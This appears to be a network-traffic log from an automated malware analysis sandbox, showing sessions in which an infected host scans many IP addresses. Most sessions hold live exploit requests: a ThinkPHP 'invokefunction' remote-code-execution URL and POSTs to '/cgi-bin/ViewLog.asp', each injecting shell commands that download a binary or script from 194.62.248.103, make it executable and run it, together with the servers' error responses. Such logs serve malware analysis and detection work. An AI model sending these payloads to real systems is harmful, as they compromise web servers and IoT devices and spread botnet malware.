                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:37:24 GMT
                                                        Date: Sun, 14 Apr 2024 14:37:24 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 31 37 35 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 34 34 34 26 23 34 36 3b 33 63 61 37 36 37 33 65 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 61 31 37 35 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 34 34 34 26 23 34 36 3b 33 63 61 37 36 37 33 65 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a1757b5c&#46;1713105444&#46;3ca7673e<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;a1757b5c&#46;1713105444&#46;3ca7673e</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        967192.168.2.234089495.216.68.5880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.165020943 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:24.482250929 CEST339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:37:24 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        968192.168.2.233452095.142.160.1180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.168009043 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:24.488668919 CEST404INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:46 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        969192.168.2.233873295.210.132.12980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.169099092 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        970192.168.2.235770495.254.169.7180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.188010931 CEST300OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User
                                                        Data Raw:
                                                        Data Ascii:
                                                        Apr 14, 2024 16:37:24.188040972 CEST21OUTData Raw: 41 67 65 6e 74 3a 20 55 69 72 75 73 75 2f 32 2e 30 0d 0a 0d 0a
                                                        Data Ascii: Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:24.535330057 CEST403INHTTP/1.1 401 Unauthorized
                                                        WWW-Authenticate: Basic realm="Protected"
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 54 69 41 6c 61 72 6d 20 57 65 62 53 65 72 76 65 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 23 33 33 33 33 33 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 23 39 39 39 39 39 39 20 66 61 63 65 3d 22 56 65 72 64 61 6e 61 2c 47 65 6e 65 76 61 2c 73 61 6e 73 2d 73 65 72 69 66 22 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 70 3e 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 20 50 61 73 73 77 6f 72 64 20 72 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 62 72 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 43 6f 70 79 72 69 67 68 74 20 26 63 6f 70 79 3b 20 32 30 31 35 2d 32 30 31 36 20 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 66 6f 6e 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>TiAlarm WebServer</title></head><body bgcolor=#333333><font color=#999999 face="Verdana,Geneva,sans-serif"><div align="center"><p><h1>Unauthorized: Password required</h1><br></p></div><br><div align="center">Copyright &copy; 2015-2016 </div></div></font></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        971192.168.2.235285095.101.47.10080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.452394962 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:24.745507002 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:37:24 GMT
                                                        Date: Sun, 14 Apr 2024 14:37:24 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 33 35 65 36 63 63 31 26 23 34 36 3b 31 37 31 33 31 30 35 34 34 34 26 23 34 36 3b 36 35 62 37 63 31 38 65 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 38 33 35 65 36 63 63 31 26 23 34 36 3b 31 37 31 33 31 30 35 34 34 34 26 23 34 36 3b 36 35 62 37 63 31 38 65 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;835e6cc1&#46;1713105444&#46;65b7c18e<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;835e6cc1&#46;1713105444&#46;65b7c18e</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        972192.168.2.234630895.171.228.19880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.518627882 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:24.848798037 CEST502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:37:24 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        973192.168.2.235385662.234.214.2438080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.563853979 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:24.884036064 CEST1246INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 1097
                                                        Date: Sun, 14 Apr 2024 14:37:24 GMT
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 34 30 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.40</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        974192.168.2.235597662.134.71.1698080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.892271996 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:26.513328075 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:26.824996948 CEST971INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 775
                                                        Date: Sun, 14 Apr 2024 14:37:25 GMT
                                                        Keep-Alive: timeout=20
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 31 30 2e 31 2e 31 31 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;cgi-bin&#47;ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/10.1.11</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        975192.168.2.235216662.29.13.1618080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:24.900026083 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
